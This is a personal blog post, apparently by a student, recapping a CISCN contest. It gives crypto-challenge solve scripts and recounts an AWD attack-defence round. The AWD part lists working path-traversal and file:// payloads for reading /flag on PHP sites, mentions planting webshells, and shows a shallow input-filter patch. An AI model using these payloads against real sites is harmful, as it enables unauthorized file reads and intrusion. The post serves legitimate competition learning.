祭第一次国赛/第一次AWD

华东北太卷啦太卷啦

线上初赛

360搁这给我高考呢是不,一卷二卷三卷发来发去收来收去的,非要让人肝到凌晨三点

Crypto

classic

谜语人给爷死

  • ADFGX密码
  • phqgmeaynofdxkrcvszwbutil
  • key classic
  • 密文反过来

rsa

Level1e=3,Level2exgcd,Level3coppersmith

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
from Crypto.Util.number import *
from hashlib import md5
from gmpy2 import *

c1 = 19105765285510667553313898813498220212421177527647187802549913914263968945493144633390670605116251064550364704789358830072133349108808799075021540479815182657667763617178044110939458834654922540704196330451979349353031578518479199454480458137984734402248011464467312753683234543319955893
n1 = 123814470394550598363280518848914546938137731026777975885846733672494493975703069760053867471836249473290828799962586855892685902902050630018312939010564945676699712246249820341712155938398068732866646422826619477180434858148938235662092482058999079105450136181685141895955574548671667320167741641072330259009
e1 = 3
m1 = iroot(c1,e1)[0]
msg1 = long_to_bytes(m1)
print(msg1)

n2 = 111381961169589927896512557754289420474877632607334685306667977794938824018345795836303161492076539375959731633270626091498843936401996648820451019811592594528673182109109991384472979198906744569181673282663323892346854520052840694924830064546269187849702880332522636682366270177489467478933966884097824069977
e2 = 17
e3 = 65537
c2 = 54995751387258798791895413216172284653407054079765769704170763023830130981480272943338445245689293729308200574217959018462512790523622252479258419498858307898118907076773470253533344877959508766285730509067829684427375759345623701605997067135659404296663877453758701010726561824951602615501078818914410959610
c3 = 91290935267458356541959327381220067466104890455391103989639822855753797805354139741959957951983943146108552762756444475545250343766798220348240377590112854890482375744876016191773471853704014735936608436210153669829454288199838827646402742554134017280213707222338496271289894681312606239512924842845268366950
gcd,a,b = gcdext(e2,e3)
if(a < 0):
c2 = inverse(c2,n2)
a = -a
if(b < 0):
c3 = inverse(c3,n2)
b = -b
m2 = pow(c2,a,n2) * pow(c3,b,n2) % n2
msg2 = long_to_bytes(m2)
print(msg2)

'''
n = 113432930155033263769270712825121761080813952100666693606866355917116416984149165507231925180593860836255402950358327422447359200689537217528547623691586008952619063846801829802637448874451228957635707553980210685985215887107300416969549087293746310593988908287181025770739538992559714587375763131132963783147
p0 = 7117286695925472918001071846973900342640107770214858928188419765628151478620236042882657992902<<200
kbits = 200
PR.<x> = PolynomialRing(Zmod(n))
f = x + p0
f = f.monic()
x0 = f.small_roots(X=2^kbits, beta=0.4)[0]
p = x0 + p0
print(p)
'''
c3 = 59213696442373765895948702611659756779813897653022080905635545636905434038306468935283962686059037461940227618715695875589055593696352594630107082714757036815875497138523738695066811985036315624927897081153190329636864005133757096991035607918106529151451834369442313673849563635248465014289409374291381429646
n3 = 113432930155033263769270712825121761080813952100666693606866355917116416984149165507231925180593860836255402950358327422447359200689537217528547623691586008952619063846801829802637448874451228957635707553980210685985215887107300416969549087293746310593988908287181025770739538992559714587375763131132963783147
p3 = 11437038763581010263116493983733546014403343859218003707512796706928880848035239990740428334091106443982769386517753703890002478698418549777553268906496423
q3 = n3 // p3
assert p3*q3 == n3
phi3 = (p3-1) * (q3-1)
d3 = inverse(e3,phi3)
m3 = pow(c3,d3,n3)
msg3 = long_to_bytes(m3)
print(msg3)

msg = msg1 + msg2 + msg3
flag = "CISCN{"+(md5(msg).hexdigest())+"}"

imageencrypt

首先因为a^b=~a^~b,用两个cipher和一个simple求出plain的前256位,接着再用一组对应的明文和密文求出key的可能配对还原出还原出bins之后去算xlist,接着算r,找到差距最小的基本上就是r的取值了由于精度损失,我们如果得到准确的x值较为困难,所以选择爆破x0,key1 key2 x0 r都已知,对cipher2再加密一次即可得到flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
from Crypto.Util.number import *
from gmpy2 import *
import md5

temp = []
cipher1 = []
cipher2 = []
f = open("out","r")
data = f.readline()[1:-2].split(", ")
for i in data:
temp.append(int(i))
data = f.readline()[1:-2].split(", ")
for i in data:
cipher1.append(int(i))
data = f.readline()[1:-2].split(", ")
for i in data:
cipher2.append(int(i))

assert len(temp) == 16 * 16
assert len(cipher1) == 16 * 16
assert len(cipher2) == 24 * 16

plain = []
for i in range(16*16):
plain.append(temp[i] ^ cipher1[i] ^ cipher2[i])

dic = {}
for i in range(16*16):
ans = temp[i] ^ cipher1[i]
if(ans not in dic):
dic[ans] = 1
else:
dic[ans] += 1
ans = plain[i] ^ cipher2[i]
if(ans not in dic):
dic[ans] = 1
else:
dic[ans] += 1
# print(dic)

# r = 1.2
# key_pair = (78 or 177) & (86 or 169)
key1 = 169
key2 = 78

bin_x = ''
for i in range(16*16):
if((temp[i] ^ key1)&0xff == cipher1[i]):
bin_x += '00'
elif((~temp[i] ^ key1)&0xff == cipher1[i]):
bin_x += '01'
elif((temp[i] ^ key2)&0xff == cipher1[i]):
bin_x += '10'
elif((~temp[i] ^ key2)&0xff == cipher1[i]):
bin_x += '11'
else:
print("ERROR")
exit(0)
# print(bin_x)

bin_xx = ''
for i in range(16*16):
if((plain[i] ^ key1)&0xff == cipher2[i]):
bin_xx += '00'
elif((~plain[i] ^ key1)&0xff == cipher2[i]):
bin_xx += '01'
elif((plain[i] ^ key2)&0xff == cipher2[i]):
bin_xx += '10'
elif((~plain[i] ^ key2)&0xff == cipher2[i]):
bin_xx += '11'
else:
print("ERROR")
exit(0)
# print(bin_xx)

assert bin_x == bin_xx
assert len(bin_x)%16 == 0
assert len(bin_xx)%16 == 0

x_list = []
for i in range(len(bin_x)//16):
# print(i)
x = int(bin_x[i*16:i*16+16],2)
data = round(x/22000,6)
if(int(data*22000) == x):
x_list.append(data)
elif(int(round(data-0.000001,6)*22000) == x):
data = round(data-0.000001,6)
x_list.append(data)
elif(int(round(data+0.000001,6)*22000) == x):
data = round(data+0.000001,6)
x_list.append(data)
else:
print("ERROR")
exit(0)
assert int(x_list[i]*22000) == x

print(x_list)

def generate(x,r):
return round(r*x*(3-x),6)

def get_r(data):
flag = 0
r = round(data[0] / round((data[1]*(3-data[1])),6),1)
print("R:",r)
for i in range(len(data)-1):
print(i,generate(data[i],r),data[i+1],(generate(data[i],r)-data[i+1]))
return r

r = get_r(x_list)
x0 = 0.840264

def encrypt(pixel,key1,key2,x0,m,n):
num = m*n//8
seqs = []
x = x0
bins = ''
tmp = []
for i in range(num):
x = generate(x,r)
tmp.append(x)
seqs.append(int(x*22000))
for x in seqs:
bin_x = bin(x)[2:]
if len(bin_x) < 16:
bin_x = '0'*(16-len(bin_x))+bin_x
bins += bin_x
assert(len(pixel) == m*n)
cipher = [ 0 for i in range(m) for j in range(n)]
for i in range(m):
for j in range(n):
index = n*i+j
ch = int(bins[2*index:2*index+2],2)
pix = pixel[index]
if ch == 0:
pix = (pix^key1)&0xff
if ch == 1:
pix = (~pix^key1)&0xff
if ch == 2:
pix = (pix^key2)&0xff
if ch == 3:
pix = (~pix^key2)&0xff
cipher[index] = pix
return cipher

finalplain = encrypt(cipher2,key1,key2,x0,24,16)
print(plain)
print(finalplain)
'''
[136, 62, 185, 178, 49, 197, 213, 2, 251, 5, 178, 24, 142, 87, 151, 2, 198, 218, 15, 151, 74, 80, 235, 156, 39, 95, 35, 98, 83, 221, 45, 106, 103, 2, 216, 120, 68, 182, 140, 224, 170, 154, 117, 191, 170, 103, 98, 118, 58, 46, 175, 128, 240, 52, 228, 101, 247, 177, 125, 39, 101, 154, 246, 39, 100, 251, 244, 23, 23, 71, 172, 145, 123, 174, 79, 243, 61, 143, 24, 25, 144, 118, 181, 126, 49, 237, 182, 20, 115, 42, 36, 80, 0, 21, 255, 191, 152, 172, 240, 174, 101, 91, 57, 62, 187, 207, 82, 46, 238, 234, 4, 164, 171, 142, 128, 132, 234, 26, 105, 153, 165, 30, 167, 76, 203, 232, 218, 82, 247, 214, 247, 15, 8, 156, 139, 27, 3, 180, 224, 252, 194, 158, 77, 178, 248, 136, 193, 247, 92, 55, 196, 189, 67, 35, 185, 48, 215, 179, 179, 225, 132, 148, 9, 138, 103, 227, 140, 61, 89, 217, 229, 99, 215, 63, 100, 133, 222, 139, 81, 15, 149, 236, 168, 7, 102, 176, 173, 240, 149, 70, 244, 23, 243, 248, 208, 6, 156, 241, 12, 62, 45, 49, 136, 168, 187, 217, 70, 142, 94, 227, 122, 92, 209, 177, 195, 217, 218, 105, 41, 157, 66, 119, 67, 31, 130, 120, 52, 32, 18, 49, 34, 17, 145, 170, 89, 38, 27, 102, 52, 42, 65, 161, 182, 114, 194, 205, 16, 53, 139, 167, 115, 92, 87, 210, 95, 44]
[136, 62, 185, 178, 49, 197, 213, 2, 251, 5, 178, 24, 142, 87, 151, 2, 198, 218, 15, 151, 74, 80, 235, 156, 39, 95, 35, 98, 83, 221, 45, 106, 103, 2, 216, 120, 68, 182, 140, 224, 170, 154, 117, 191, 170, 103, 98, 118, 58, 46, 175, 128, 240, 52, 228, 101, 247, 177, 125, 39, 101, 154, 246, 39, 100, 251, 244, 23, 23, 71, 172, 145, 123, 174, 79, 243, 61, 143, 24, 25, 144, 118, 181, 126, 49, 237, 182, 20, 115, 42, 36, 80, 0, 21, 255, 191, 152, 172, 240, 174, 101, 91, 57, 62, 187, 207, 82, 46, 238, 234, 4, 164, 171, 142, 128, 132, 234, 26, 105, 153, 165, 30, 167, 76, 203, 232, 218, 82, 247, 214, 247, 15, 8, 156, 139, 27, 3, 180, 224, 252, 194, 158, 77, 178, 248, 136, 193, 247, 92, 55, 196, 189, 67, 35, 185, 48, 215, 179, 179, 225, 132, 148, 9, 138, 103, 227, 140, 61, 89, 217, 229, 99, 215, 63, 100, 133, 222, 139, 81, 15, 149, 236, 168, 7, 102, 176, 173, 240, 149, 70, 244, 23, 243, 248, 208, 6, 156, 241, 12, 62, 45, 49, 136, 168, 187, 217, 70, 142, 94, 227, 122, 92, 209, 177, 195, 217, 218, 105, 41, 157, 66, 119, 67, 31, 130, 120, 52, 32, 18, 49, 34, 17, 145, 170, 89, 38, 27, 102, 52, 42, 65, 161, 182, 114, 194, 205, 16, 53, 139, 167, 115, 92, 87, 210, 95, 44, 210, 63, 158, 223, 183, 161, 91, 36, 201, 53, 92, 222, 105, 246, 80, 94, 170, 10, 132, 110, 0, 151, 77, 91, 209, 110, 100, 206, 195, 88, 103, 183, 7, 98, 163, 42, 44, 115, 82, 184, 200, 122, 56, 188, 106, 159, 221, 166, 213, 81, 162, 64, 116, 213, 43, 32, 5, 223, 135, 182, 64, 54, 111, 218, 126, 75, 92, 205, 231, 15, 8, 66, 34, 52, 115, 246, 96, 227, 92, 211, 76, 204, 217, 20, 239, 144, 139, 90, 136, 142, 197, 83, 43, 96, 248, 76, 17, 70, 13, 49, 18, 69, 95, 31, 198, 181, 32, 119, 253, 42, 73, 70, 106, 29, 38, 20, 232, 108, 244, 219, 72, 144, 109, 146, 32, 250, 83, 99]
'''
data = ''.join(map(chr,finalplain))
print(data)
flag = "CISCN{"+md5.new(data).hexdigest()+"}"
print(flag)

homo

拿312次随机数,就能还原states,接着预判接下来的200次win了之后即可decrypt,由于系数不能完全相同,给其加上个模数即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
from Crypto.Util.number import long_to_bytes
from random import *
from pwn import *
from poly import *

# context.log_level = 'debug'
r = remote("124.71.229.150", "23474")

def get_coefficient():
data = r.recvline(False).strip().decode()[1:-1].split(", ")
coefficient = []
for i in data:
coefficient.append(int(i))
return coefficient

q = 2**54
n = 1024

data1 = get_coefficient()
data2 = get_coefficient()
data3 = get_coefficient()
data4 = get_coefficient()

def RightXor(value,shift,bits=32):
tmp = value
for i in range(bits // shift):
tmp = value ^ tmp >> shift
return tmp
def RightXorMasked(value,shift,mask,bits=32):
tmp = value
for i in range(bits // shift):
tmp = value ^ tmp >> shift & mask
return tmp
def LeftXor(value, shift,bits=32):
tmp = value
for i in range(bits // shift):
tmp = value ^ tmp << shift
return tmp
def LeftXorMasked(value, shift, mask,bits=32):
tmp = value
for i in range(bits // shift):
tmp = value ^ tmp << shift & mask
return tmp

def get_state(x):
x = RightXor(x,18)
x = LeftXorMasked(x,15,4022730752)
x = LeftXorMasked(x,7,2636928640)
x = RightXor(x,11)
return x

def play_game():
r.recvuntil("2.decrypt\n\n")
r.sendline("1")
my_states = []
for i in range(312):
r.recvuntil("your number:")
r.sendline("1")
r.recvuntil("my number is ")
num = bin(int(r.recvline(False).strip().decode()))[2:]
num1,num2 = int(num[-32:],2),int(num[:-32],2)
my_states.append(get_state(num1))
my_states.append(get_state(num2))
assert len(my_states) == 624
print("my_states ready!")
my_random = Random()
my_random.setstate((3,tuple(my_states+[0]),None))
for i in range(312):
my_random.getrandbits(64)
for i in range(200):
r.recvuntil("your number:")
x = my_random.getrandbits(64)
r.sendline(str(x))
r.recvline(False)

play_game()
print("Win!")

r.recvuntil("2.decrypt\n\n")
r.sendline("2")
r.recvuntil("c0:\n")
for i in range(len(data3)-1):
r.send(str(data3[i])+', ')
r.sendline(str(data3[-1]+q))
r.recvuntil("c1:\n")
for i in range(len(data4)-1):
r.send(str(data4[i])+', ')
r.sendline(str(data4[-1]+q))

finaldata = r.recvline(False).strip().decode()[1:-1].split(", ")
flag = ''
for i in finaldata:
flag += i
flag = int(flag,2)
print(flag)
print(long_to_bytes(flag))
r.interactive()
'''
[0, 1, 0, 0, 0, 0, 1, 1, 0, 1, 0, 0, 1, 0, 0, 1, 0, 1, 0, 1, 0, 0, 1, 1, 0, 1, 0, 0, 0, 0, 1, 1, 0, 1, 0, 0, 1, 1, 1, 0, 0, 1, 1, 1, 1, 0, 1, 1, 0, 1, 1, 0, 0, 1, 1, 1, 0, 1, 1, 1, 0, 1, 0, 0, 0, 0, 1, 1, 0, 1, 1, 0, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 1, 0, 0, 1, 0, 0, 1, 0, 1, 1, 0, 1, 0, 1, 1, 0, 0, 1, 0, 1, 0, 1, 0, 0, 0, 0, 1, 1, 0, 1, 0, 1, 0, 0, 0, 1, 0, 1, 0, 0, 1, 0, 1, 1, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 1, 1, 0, 1, 0, 1, 1, 1, 0, 1, 1, 1, 0, 1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 1, 0, 0, 1, 1, 0, 1, 1, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 0, 1, 0, 1, 1, 0, 1, 0, 1, 0, 0, 1, 0, 1, 1, 0, 1, 1, 0, 1, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 1, 0, 0, 1, 0, 1, 1, 0, 1, 0, 1, 1, 1, 0, 0, 1, 0, 0, 1, 1, 0, 0, 0, 0, 1, 0, 1, 1, 1, 0, 1, 1, 0, 0, 1, 1, 1, 0, 1, 0, 1, 0, 1, 0, 0, 1, 1, 1, 1, 0, 0, 1, 0, 1, 1, 0, 1, 0, 1, 1, 1, 1, 1, 0, 1, 0, 0, 0, 0, 1, 0, 1, 0, 1, 1, 0, 1, 1, 0, 1, 0, 0, 0, 1, 0, 1, 1, 1, 0, 1, 0, 1, 0, 0, 0, 1, 1, 0, 0, 0, 1, 1, 1, 0, 0, 0, 1, 0, 0, 1, 1, 0, 1, 1, 0, 0, 0, 1, 1, 0, 1, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0, 0, 1, 0, 0, 1, 0, 1, 1, 1, 0, 1, 0, 1, 1, 0, 1, 1, 1, 1, 0, 1, 0, 1, 1, 0, 0, 1, 1, 0, 0, 1, 0, 0, 0, 1, 1, 0, 1, 0, 1, 0, 1, 0, 1, 1, 1, 0, 1, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 1, 0, 0, 1, 1, 1, 1, 0, 0, 1, 1, 0, 1, 0, 1, 1, 0, 1, 0, 0, 1, 0, 0, 1, 0, 1, 0, 1, 0, 1, 1, 0, 1, 0, 1, 0, 1, 1, 1, 1, 1, 0, 0, 1, 0, 0, 0, 1, 0, 1, 0, 0, 1, 0, 1, 0, 0, 0, 0, 1, 0, 1, 1, 0, 1, 0, 1, 0, 1, 1, 1, 1, 1, 1, 0, 1, 0, 1, 1, 1, 1, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 1, 0, 1, 0, 0, 0, 1, 0, 1, 1, 1, 0, 0, 1, 0, 1, 1, 1, 1, 0, 1, 0, 1, 1, 0, 1, 0, 1, 1, 1, 1, 0, 0, 1, 1, 0, 1, 1, 0, 0, 0, 0, 1, 1, 0, 1, 0, 0, 1, 0, 1, 0, 1, 1, 1, 0, 1, 0, 0, 1, 0, 1, 0, 1, 0, 1, 1, 0, 1, 1, 0, 0, 1, 0, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 1, 1, 0, 0, 1, 0, 1, 1, 0, 1, 1, 1, 0, 1, 0, 1, 1, 0, 1, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 1, 0, 0, 0, 1, 1, 0, 1, 1, 0, 0, 1, 1, 0, 0, 0, 1, 1, 1, 1, 0, 1, 0, 1, 1, 1, 1, 0, 0, 1, 0, 0, 1, 0, 1, 0, 1, 0, 1, 1, 1, 1, 1, 1, 0, 1, 1, 0, 1, 0, 0, 1, 0, 1, 1, 1, 0, 0, 0, 0, 1, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 1, 1, 0, 0, 0, 1, 0, 1, 1, 0, 1, 1, 1, 1, 0, 0, 1, 1, 0, 1, 0, 1, 0, 0, 0, 1, 0, 0, 1, 0, 0, 1, 0, 1, 1, 0, 1, 1, 1, 1, 1, 0, 0, 0, 1, 1, 0, 0, 1, 1, 1, 0, 1, 0, 0, 0, 0, 1, 1, 0, 1, 1, 0, 0, 0, 0, 1, 1, 1, 1, 0, 1, 1, 0, 1, 0, 1, 0, 1, 0, 0, 1, 1, 0, 1, 0, 0, 1, 1, 1, 1, 1, 0, 1, 1, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 1, 0, 0, 1, 0, 1, 1, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 1, 0, 1, 1, 1, 0, 1, 1, 0, 1, 0, 0, 0, 1, 0, 1, 1, 1, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 1, 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 0, 1, 0, 1, 0, 1, 0, 0, 0, 0, 1, 1, 1, 0, 0, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 0, 1, 1, 0, 0, 0, 0, 0, 1, 0, 0, 1, 1, 0, 1, 0, 0, 1, 1, 1, 0, 1, 1, 1, 0, 1, 1, 0, 1, 1, 1, 1, 0, 0, 1, 0, 1, 0, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 0, 1, 0, 1, 0, 0, 1, 1, 0, 1, 0, 1, 1, 0, 1, 0, 0, 1, 1, 1, 0, 1, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 1, 0, 0, 1, 1, 0, 1]
'''

move

根据题目有 $ex-yn=y(p+q+1)-z$,且发现 $e$ 和 $N$ 比较小那么就可以造格子进行格基规约,这样就能求出 $x$ 和 $y=ex//n$ 那么余数
$$
\begin{aligned}
k&=y(p+q+1)-z\\
&=ex-ynk \\
&= y(p+q+1)-z \\
&= y(p+q+1) - zbound - ((p + 1)(q + 1)y - zbound)\mod x \\
&= y(p+q+1) + int(\frac{((p-q)y\cdot round(n^{0.25}))}{(3(p + q))}) - ((p + 1)(q + 1)y - zbound)\mod x \\
&=y((p+q+1) + \frac{(p-q)\cdot round(n^{0.25}))}{(3(p + q))}
\end{aligned}
$$
所以 $k$ 整除 $y$ ,这里我们设 $K=\frac{k}{y}=\frac{(p+q+1) + ((p-q)\cdot round(n^{0.25}))}{(3*(p + q))}$ 我们设 $s=p+q$ ,则 $p-q=\frac{3s(K-1-s)}{round(n^{0.25})}$ ,根据 $(p+q)^2-(p-q)^2=4n$ ,二分即可找到 $s$ ,接着算出 $d$ ,在ECC上进行标量乘法即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
from Crypto.Util.number import *
from gmpy2 import *

def add(p1, p2):
if p1 == (0, 0):
return p2
if p2 == (0, 0):
return p1
if p1[0] == p2[0] and (p1[1] != p2[1] or p1[1] == 0):
return (0, 0)
if p1[0] == p2[0]:
tmp = (3 * p1[0] * p1[0]) * inverse(2 * p1[1], n) % n
else:
tmp = (p2[1] - p1[1]) * inverse(p2[0] - p1[0], n) % n
x = (tmp * tmp - p1[0] - p2[0]) % n
y = (tmp * (p1[0] - x) - p1[1]) % n
return (int(x), int(y))

def mul(n, p):
r = (0, 0)
tmp = p
while 0 < n:
if n & 1 == 1:
r = add(r, tmp)
n, tmp = n >> 1, add(tmp, tmp)
return r

n = 80263253261445006152401958351371889864136455346002795891511487600252909606767728751977033280031100015044527491214958035106007038983560835618126173948587479951247946411421106848023637323702085026892674032294882180449860010755423988302942811352582243198025232225481839705626921264432951916313817802968185697281
e = 67595664083683668964629173652731210158790440033379175857028564313854014366016864587830963691802591775486321717360190604997584315420339351524880699113147436604350832401671422613906522464334532396034178284918058690365507263856479304019153987101884697932619200538492228093521576834081916538860988787322736613809
M = Matrix(ZZ,[[2**512,e],[0,-n]])
A = M.LLL()[0]
x = A[0]>>512
print((e*x-A[1])//n)
e = 67595664083683668964629173652731210158790440033379175857028564313854014366016864587830963691802591775486321717360190604997584315420339351524880699113147436604350832401671422613906522464334532396034178284918058690365507263856479304019153987101884697932619200538492228093521576834081916538860988787322736613809
n = 80263253261445006152401958351371889864136455346002795891511487600252909606767728751977033280031100015044527491214958035106007038983560835618126173948587479951247946411421106848023637323702085026892674032294882180449860010755423988302942811352582243198025232225481839705626921264432951916313817802968185697281
y = -22131877391133483964429946329193825460775374851078084751208971056041193500203
c = (6785035174838834841914183175930647480879288136014127270387869708755060512201304812721289604897359441373759673837533885681257952731178067761309151636485456082277426056629351492198510336245951408977207910307892423796711701271285060489337800033465030600312615976587155922834617686938658973507383512257481837605, 38233052047321946362283579951524857528047793820071079629483638995357740390030253046483152584725740787856777849310333417930989050087087487329435299064039690255526263003473139694460808679743076963542716855777569123353687450350073011620347635639646034793626760244748027610309830233139635078417444771674354527028)
x = -26279444166664821795077701675621823220865336004430428203703688888211697122228
k = e*x-y*n
K = k//y
print(k)
print(K)
def factor(K,N):
l = 0
r = K
for i in range(518):
s = (l+r)//2
v = s*s - (9*s*s*(K-1-s)*(K-1-s)//(round(N**0.25)*round(N**0.25)))
if v < 4*N:
l = s
else:
r = s
return r
factor(K,n)

S = 18383013852155207284866834850624501649134164688503883162216824258842790032992437383933186349369945088653252318167911285710266631681220716855493349532603970
d = inverse(e,n+1+S)
print(d)
m = mul(d,c)
flag = long_to_bytes(m[0]) + long_to_bytes(m[1])
print(flag)

Misc

robot

追踪TCP流找到坐标,画图即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
import matplotlib.pyplot as plt
from hashlib import md5
import re

f = open("data.txt","r")
data = f.read()

ff = re.compile(r'Value.\[(.*?)\]')
res = ff.findall(data)
print(res)

x_list = []
y_list = []
z_list = []
for i in res:
i = i.split(",")
x,y,z = int(i[0]),int(i[1]),int(i[2])
x_list.append(x)
y_list.append(-y)
z_list.append(z)

print(x_list)
print(y_list)
print(z_list)

plt.plot(x_list,y_list,'o')
plt.show()

print("CISCN{"+md5(b"easy_robo_xx").hexdigest()+"}")

华东北半决赛

攻防科技大学主办的,半决赛就发衣服,80个队的awd体验还不错(?

冥场面

冥场面

虽然自己被打傻了,不过自己也打了个爽,全程看流量打人/修站(雾

cafecms

构造了这么几种payload

/wap/Common/show?templateFile=../../../../../../../flag
/wap/Common/show?templateFile=/flag
/wap/Common/show?templateFile=file:////flag

去找了一下调用的函数位置,检查一下templateFile如果有flag直接改空就防住了

D盾还扫出来个eval后门,只不过不会用也不会修,后来被打的连妈都不认识了w

eyou

刚开始没看这题,连上之后发现MySQL库被人删了,再后来直接被get shell了,又是一个被打的连妈都不认识的站w

在之后重启了一波,结果admin.php给人写了rce,flag直接被挂首页w

cryptopark

awd里居然看见了密码题?拖进IDA看了两眼发现有好几个密码题,而且只要小小伪造一下就能\bin\sh了,然后光速写了几个密码exp接着打全场(嘻嘻),后来师傅们也从堆用pwn的方法get shell了,接着拿去批量跑

lol

又是个任意读,不过这次我手速快,光速写exp打了一波全场 (嘻嘻)
大概这么几种姿势

/statics/1.php?file=file:///flag
/statics/1.php?file=/flag
/statics/1.php?file=../../../../../../../flag

修好之后发现还有人打,抓了一下流量看到这个payload

/index.php?g=Admin&m=Public&a=display&templateFile=../../../../../../../../../../../../../../flag

web小白根本看不太懂PHP,更别说代码审计了wAw,于是就现场看着PHP手册和原先写好的PHP源码现场极限学习

先看index.php有这么段读参数的代码

1
2
3
4
5
foreach (array("g", "m") as $v) {
if (isset($_GET[$v])) {
$_GET[$v] = ucwords($_GET[$v]);
}
}

那既然这段payload要过index.php,而所传的变量名又已知,为了短期防御,那么就可以在这个地方把所有的变量都读进来,然后处理掉就行了

1
2
3
4
5
6
7
8
9
10
11
foreach (array("g", "m", "a", "templateFile") as $v) {
if (isset($_GET[$v])) {
if($v == "templateFile" && (
($_GET[$v][0] == '.' && $_GET[$v][1] == '.') ||
($_GET[$v][0] == '/' && $_GET[$v][1] == 'f') ||
($_GET[$v][0] == 'f' && $_GET[$v][1] == 'i'))){
die(0);
}
$_GET[$v] = ucwords($_GET[$v]);
}
}

修好之后接着拿这几个payload去打别人了(

/index.php?g=Admin&m=Public&a=display&templateFile=../../../../../../../../../../../../../../flag
/index.php?g=Admin&m=Public&a=display&templateFile=/flag
/index.php?g=Admin&m=Public&a=display&templateFile=file://///flag

Summary

打到后面后台脚本把内存跑到16G,加上OBS和一堆乱七八糟的玩意中间炸过一次内存w,到最后的时候被打成筛子就只能检查自己的批量脚本有没有正常工作了,7个while 1的脚本同时跑着10+的payload,还有五六个打奇奇怪怪的混淆流量的脚本 (雾

各位师傅们的混淆也是tmd千奇百怪,我以为我防出去了啊,结果师傅们不讲武德,给我种🐎,打开流量我定睛一看,在一堆fmyy i love youxxxx yyds还有奇奇怪怪的歌词里面,写的竟然全是.shell.php!(雾

既然我们有🐎,那别人肯定也有,然后搭了几趟顺风车,不过web小白啥也不会,别人稍微藏起来之后就尬住了w

结果rk20
res

唉,还是太菜了,第一年也只能止步于此了(

Final

u1s1,平时都凭本事打进了W&M,结果校赛被分到3队有、不开心

初赛高考没啥好说的,crypto打了2k+的分把2队按在地上锤(雾

怎么说呢,第一次打awd的萌新算是打了个爽,线下前一天晚上还在和h3zh1师傅学习怎么打awd,在现场用ha1c9on师傅教过的一点web加被迫极限学习边打边修,可能从此就转路web了(?

我也要在别人机子上种🐎!我也要get shell!(逃

感谢师傅们对我这个fw的栽培和帮助,qaq明年继续加油吧